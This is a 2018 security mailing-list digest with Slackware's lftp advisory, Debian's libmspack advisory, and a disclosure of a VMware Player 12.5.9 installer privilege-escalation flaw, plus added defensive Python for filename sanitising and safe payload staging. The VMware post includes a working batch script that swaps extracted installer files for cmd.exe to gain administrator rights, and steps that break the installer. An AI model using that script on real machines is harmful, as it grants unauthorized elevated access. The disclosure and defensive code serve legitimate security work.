[slackware-security] lftp (SSA:2018-214-01)

2018-08-02 Thread Slackware Security Team


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[slackware-security]  lftp (SSA:2018-214-01)

New lftp packages are available for Slackware 14.0, 14.1, 14.2, and -current to
fix a security issue.


Here are the details from the Slackware 14.2 ChangeLog:
+--+
patches/packages/lftp-4.8.4-i586-1_slack14.2.txz:  Upgraded.
  It has been discovered that lftp up to and including version 4.8.3 does
  not properly sanitize remote file names, leading to a loss of integrity
  on the local system when reverse mirroring is used. A remote attacker
  may trick a user to use reverse mirroring on an attacker controlled FTP
  server, resulting in the removal of all files in the current working
  directory of the victim's system.
  For more information, see:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10916
  (* Security fix *)
+--+


Where to find the new packages:
+-+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/lftp-4.8.4-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/lftp-4.8.4-x86_64-1_slack14.0.txz

Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/lftp-4.8.4-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/lftp-4.8.4-x86_64-1_slack14.1.txz

Updated package for Slackware 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/lftp-4.8.4-i586-1_slack14.2.txz

Updated package for Slackware x86_64 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/lftp-4.8.4-x86_64-1_slack14.2.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/lftp-4.8.4-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/lftp-4.8.4-x86_64-1.txz


MD5 signatures:
+-+

Slackware 14.0 package:
b303a9afed31b7e1e63fd89f97b930b9  lftp-4.8.4-i486-1_slack14.0.txz

Slackware x86_64 14.0 package:
5f9f3d0523f105f2b9208605a0f8ce8f  lftp-4.8.4-x86_64-1_slack14.0.txz

Slackware 14.1 package:
a8bc385e644200237999bdf998ebd6cd  lftp-4.8.4-i486-1_slack14.1.txz

Slackware x86_64 14.1 package:
7d12b70c48cba62ca3b4e76a6a14c5d2  lftp-4.8.4-x86_64-1_slack14.1.txz

Slackware 14.2 package:
52f999b2dd00680235b93dd8de488d49  lftp-4.8.4-i586-1_slack14.2.txz

Slackware x86_64 14.2 package:
0a90effcd6dea9f0957d8d72475d0d51  lftp-4.8.4-x86_64-1_slack14.2.txz

Slackware -current package:
c8bdc8b30de7eb688b832a20b23d8578  n/lftp-4.8.4-i586-1.txz

Slackware x86_64 -current package:
a1340ec3d270601cfb9c05379ddcf7df  n/lftp-4.8.4-x86_64-1.txz


Installation instructions:
++

Upgrade the package as root:
# upgradepkg lftp-4.8.4-i586-1_slack14.2.txz


+-+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com

-BEGIN PGP SIGNATURE-

iEYEARECAAYFAltjZkQACgkQakRjwEAQIjMzyQCff5GDd+V8XHstP7vRnevCKiO6
sBUAnjwfKaQic7sF5UYjLpRaWh927/38
=8IDa
-END PGP SIGNATURE-
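Added example, not part of the Slackware advisory and not lftp's own fix: the advisory states the problem only at the level of "remote file names are not properly sanitized before local filesystem operations". The Python below shows the kind of check a client should apply to every name a server returns before it is joined onto a local path, rejecting the entries that would make a create, overwrite or delete reach the mirror directory itself, its parent, or a sibling tree. The function names, `LOCAL_ROOT` and `SAMPLE_LISTING` are all constructed for this illustration.

```python
"""Validate server-supplied file names before they touch the local filesystem.

Added example for the lftp advisory above; it is not lftp's code and does not
claim to reproduce lftp's patch.  SAMPLE_LISTING and LOCAL_ROOT are constructed.
"""
import os


class UnsafeName(ValueError):
    """A remote name that must not be used as a local path component."""


def check_remote_name(name):
    """Return `name` if it is a single, plain path component; raise otherwise.

    A server that lists '.', '..' or anything containing a separator is either
    broken or hostile: turning such an entry into a local path would address
    the mirror directory itself, its parent, or an arbitrary other tree.
    Backslashes are rejected too, because the local side may be Windows.
    """
    if not isinstance(name, str) or name == "":
        raise UnsafeName("empty name")
    if name in (".", ".."):
        raise UnsafeName(f"directory reference {name!r}")
    if "/" in name or "\\" in name:
        raise UnsafeName(f"path separator in {name!r}")
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in name):
        raise UnsafeName(f"control character in {name!r}")
    return name


def local_path_for(local_root, remote_name):
    """Join a validated name under local_root and confirm it stays directly inside.

    realpath() also resolves an existing local symlink of that name, so a name
    whose local counterpart already points outside the root is refused as well.
    """
    root = os.path.realpath(local_root)
    candidate = os.path.realpath(os.path.join(root, check_remote_name(remote_name)))
    if os.path.dirname(candidate) != root:
        raise UnsafeName(f"{remote_name!r} resolves outside {root!r}")
    return candidate


def filter_listing(local_root, listing):
    """Split a remote directory listing into usable names and rejected ones.

    Returns (safe, rejected): safe maps each accepted name to its local path,
    rejected maps each refused name to the reason.  Only names in `safe` may
    be created, overwritten or deleted locally.
    """
    safe, rejected = {}, {}
    for name in listing:
        try:
            safe[name] = local_path_for(local_root, name)
        except UnsafeName as why:
            rejected[name] = str(why)
    return safe, rejected


# Constructed listing as a hostile FTP server might return it: one ordinary
# file surrounded by entries that would point a local delete at the wrong place.
LOCAL_ROOT = "/srv/mirror"   # constructed; the directory need not exist
SAMPLE_LISTING = [
    ".", "..", "../.bashrc", "ok.txt", "sub/evil.txt",
    "bad\x00.txt", "..\\boot.ini", "",
]


def demo():
    """Run the filter over the constructed listing."""
    return filter_listing(LOCAL_ROOT, SAMPLE_LISTING)


if __name__ == "__main__":
    safe, rejected = demo()
    for name, path in safe.items():
        print("accept", repr(name), "->", path)
    for name, why in rejected.items():
        print("reject", repr(name), ":", why)
```

The containment test in `local_path_for` is deliberately strict (the resolved parent must be exactly the root): a mirror client that needs to handle subdirectories should validate each component separately and recurse, rather than accept a separator in a name.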


[SECURITY] [DSA 4260-1] libmspack security update

2018-08-02 Thread Salvatore Bonaccorso
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-4260-1   secur...@debian.org
https://www.debian.org/security/ Salvatore Bonaccorso
August 02, 2018   https://www.debian.org/security/faq
- -

Package: libmspack
CVE ID : CVE-2018-14679 CVE-2018-14680 CVE-2018-14681 CVE-2018-14682
Debian Bug : 904799 904800 904801 904802

Several vulnerabilities were discovered in libmspack, a library used to
handle Microsoft compression formats. A remote attacker could craft
malicious CAB, CHM or KWAJ files and use these flaws to cause a denial
of service via application crash, or potentially execute arbitrary code.

For the stable distribution (stretch), these problems have been fixed in
version 0.5-1+deb9u2.

We recommend that you upgrade your libmspack packages.

For the detailed security status of libmspack please refer to its
security tracker page at:
https://security-tracker.debian.org/tracker/libmspack

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



Executable installers are vulnerable^WEVIL (case 55): escalation of privilege with VMware Player 12.5.9

2018-08-02 Thread Stefan Kanthak
Hi @ll,

the executable installer of VMware Player 12.5.9, published in
January 2018, available from , is vulnerable.

JFTR: VMware Player 12.5.9 is the last version which runs on
  32-bit Windows, and the last to support older CPUs.


Although running with administrative privileges (its embedded
application manifest specifies "requireAdministrator"),
VMware-player-12.5.9-7535481.exe extracts files UNPROTECTED
into subdirectories of the user's %TEMP% directory for later
execution.
An UNPRIVILEGED process/user running under the same user
account can tamper with these unprotected files between their
creation and their use, resulting in escalation of privilege.


For this well-known and well-documented vulnerability see
 and
 plus
 and



Demonstrations/proof of concepts:
~

The POCs work on standard installations of Windows, where the
user account created during Windows Setup is used.

This precondition is typically met: according to Microsoft's
own security intelligence reports, about 1/2 to 3/4 of the
about 600 million Windows installations which send telemetry
data have only ONE active user account.
See 


A) "escalation of privilege":
-

1. create the following text file in an arbitrary directory:

   --- vmware12.cmd ---
   REM wait until the elevated installer has started extracting into %TEMP%
   :LOOP1
   @If Not Exist "%TEMP%\{3932C891-5563-421D-B9C0-DEA6CB35F9F4}~setup\vcredist_x86.exe" Goto :LOOP1

   REM replace the extracted MSI with an empty file (the Windows Installer
   REM error seen in step 3)
   Copy NUL: "%TEMP%\{3932C891-5563-421D-B9C0-DEA6CB35F9F4}~setup\VMwarePlayer.msi"

   :LOOP2
   @If Not Exist "%TEMP%\{3932C891-5563-421D-B9C0-DEA6CB35F9F4}~setup\vcredist_x64.exe" Goto :LOOP2

   REM replace the extracted redistributables with the command processor,
   REM which the installer then runs with administrative rights
   Copy "%COMSPEC%" "%TEMP%\{3932C891-5563-421D-B9C0-DEA6CB35F9F4}~setup\vcredist_x86.exe"

   REM the installer may still hold the x64 file open; retry until the copy succeeds
   :LOOP3
   Copy "%COMSPEC%" "%TEMP%\{3932C891-5563-421D-B9C0-DEA6CB35F9F4}~setup\vcredist_x64.exe"
   If ERRORLEVEL 1 Goto :LOOP3
   --- EOF ---

2. fetch the executable installer VMware-player-12.5.9-7535481.exe;

3. start the batch script created in step 1, then run the executable
   installer: notice the error message from the Windows Installer,
   and the start of the command processor with administrative rights!


B) "denial of service":
---

1. add the NTFS "access control list entry" (D;OIIO;WP;;;WD) meaning
   "deny execution of files in this directory for everyone, inheritable
   to files in all subdirectories" to the user's %TEMP% directory;

2. fetch the executable installer VMware-player-12.5.9-7535481.exe
   and run it: admire the MISLEADING wrong error message
   "The installer could not load a required DLL"!


C) "denial of service":
---

1. create a(n empty) file
   %TEMP%\{3932C891-5563-421D-B9C0-DEA6CB35F9F4}~setup

2. create the directory C:\VMwareTemp and the (empty) file
   C:\VMwareTemp\{3932C891-5563-421D-B9C0-DEA6CB35F9F4}~setup

3. fetch the executable installer VMware-player-12.5.9-7535481.exe
   and run it: admire the MISLEADING wrong error message
   "Not enough space"!


Mitigations:


1. DON'T use executable installers; stay far away from such
   eternally vulnerable crap!

2. NEVER run executable installers from UNSAFE directories like
   "%USERPROFILE%\Downloads\" or "%TEMP%\"
   DISABLE execution of files (as shown above) in %USERPROFILE%!

3. Practice STRICT privilege separation: use your privileged
   "Administrator" account (especially the account created during
   Windows setup) ONLY for administrative tasks, and COMPLETELY
   separate unprivileged user accounts, with elevation requests
   DISABLED, for your daily/regular work.


stay tuned
Stefan Kanthak


PS: also see 


Timeline:
~

2018-06-03    vulnerability report(s) sent to vendor

2018-06-13    vendor acknowledged receipt:
              "We will look into this and provide feedback in due course."

2018-06-14    vendor replies:
              "It is my understanding that Workstation Player 12.x has
               since reached end of general support (in February of 2018)
               as per our Lifecycle Product Matrix."

2018-08-02    report published
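Added example; it is not VMware's code and not part of Stefan Kanthak's post. The PoC above works because the elevated installer extracts its payloads into a directory the unprivileged side can write to, and then executes whatever it finds there. The Python below shows, in portable form, the two controls that close that window: stage into a freshly created, unpredictable, owner-only directory (on Windows the equivalent is a directory under a path the user cannot write to, with an explicit administrators-only DACL), and re-verify each payload's digest through the same open handle that is then handed to the executor. `PAYLOADS`, their digests, `swap_x86()` and the `run` callback that stands in for execution are all constructed for this illustration.

```python
"""Stage installer payloads privately and verify them immediately before use.

Added example for the VMware Player installer report above; not VMware's code.
PAYLOADS and swap_x86() are constructed.  Executing a payload is replaced by a
callback so the demo runs anywhere.
"""
import hashlib
import os
import shutil
import stat
import tempfile


class StagingError(Exception):
    """Staging area or payload is not in the state the installer created."""


# Constructed "embedded" payloads.  A real installer ships these inside its
# own executable and therefore knows their digests before extraction begins.
PAYLOADS = {
    "vcredist_x86.exe": b"MZ constructed redistributable (x86)",
    "vcredist_x64.exe": b"MZ constructed redistributable (x64)",
}
EXPECTED_SHA256 = {n: hashlib.sha256(d).hexdigest() for n, d in PAYLOADS.items()}


def create_private_stage(parent=None):
    """Create an unpredictable, owner-only staging directory.

    mkdtemp() picks a random name and fails if it already exists, so neither a
    pre-planted entry (PoC C) nor a fixed, guessable {GUID}~setup path is
    reused.  It creates the directory with mode 0o700; on Windows that mode is
    not meaningful and an explicit DACL is needed instead.
    """
    path = tempfile.mkdtemp(prefix="setup-", dir=parent)
    st = os.lstat(path)
    if not stat.S_ISDIR(st.st_mode):
        raise StagingError("staging path is not a directory")
    if os.name != "nt" and stat.S_IMODE(st.st_mode) != 0o700:
        raise StagingError("staging directory is not owner-only")
    return path


def extract(stage, name, data):
    """Write one payload; O_EXCL turns a planted file into an error, not a reuse."""
    try:
        fd = os.open(os.path.join(stage, name),
                     os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    except FileExistsError:
        raise StagingError(f"{name}: already present in staging directory") from None
    with os.fdopen(fd, "wb") as f:
        f.write(data)


def verify_and_run(stage, name, run):
    """Hash the staged file through one handle and pass that same handle to `run`.

    Hashing by path and then executing by path would leave a second window in
    which the file can be replaced.  One handle means the bytes hashed are the
    bytes handed to `run`, unless a writer with access to the file changes them
    in place; that is why the staging directory must be unwritable to the
    untrusted side, and the digest check is defence in depth on top of that.
    """
    fd = os.open(os.path.join(stage, name), os.O_RDONLY | getattr(os, "O_NOFOLLOW", 0))
    try:
        if not stat.S_ISREG(os.fstat(fd).st_mode):
            raise StagingError(f"{name}: not a regular file")
        h = hashlib.sha256()
        for chunk in iter(lambda: os.read(fd, 65536), b""):
            h.update(chunk)
        if h.hexdigest() != EXPECTED_SHA256[name]:
            raise StagingError(f"{name}: digest mismatch, refusing to execute")
        os.lseek(fd, 0, os.SEEK_SET)
        return run(fd)
    finally:
        os.close(fd)


def stage_and_run(tamper=None):
    """Extract everything, give `tamper(stage)` the attacker's window, then run.

    Returns {payload name: "executed" | "rejected"}.
    """
    stage = create_private_stage()
    try:
        for name, data in PAYLOADS.items():
            extract(stage, name, data)
        if tamper is not None:
            tamper(stage)                     # between creation and use
        outcome = {}
        for name in PAYLOADS:
            try:
                verify_and_run(stage, name, lambda fd: True)
                outcome[name] = "executed"
            except StagingError:
                outcome[name] = "rejected"
        return outcome
    finally:
        shutil.rmtree(stage, ignore_errors=True)


def swap_x86(stage):
    """Constructed attacker doing what the PoC does with Copy "%COMSPEC%".

    Here the 'attacker' is this same process, so the directory mode does not
    stop the write; the digest check is what catches the swap.
    """
    with open(os.path.join(stage, "vcredist_x86.exe"), "wb") as f:
        f.write(b"MZ attacker-controlled stand-in for cmd.exe")


if __name__ == "__main__":
    print(stage_and_run())                  # both executed
    print(stage_and_run(tamper=swap_x86))   # x86 rejected, x64 executed
```

On POSIX, file modes do not separate two processes of the same user, and on Windows an unelevated process in the same account can write to the user's %TEMP% regardless of how the elevated installer created the files; the digest check therefore detects the swap but does not prevent it. The actual fix for an installer that "requireAdministrator" is to extract into a location the unprivileged side cannot write to at all.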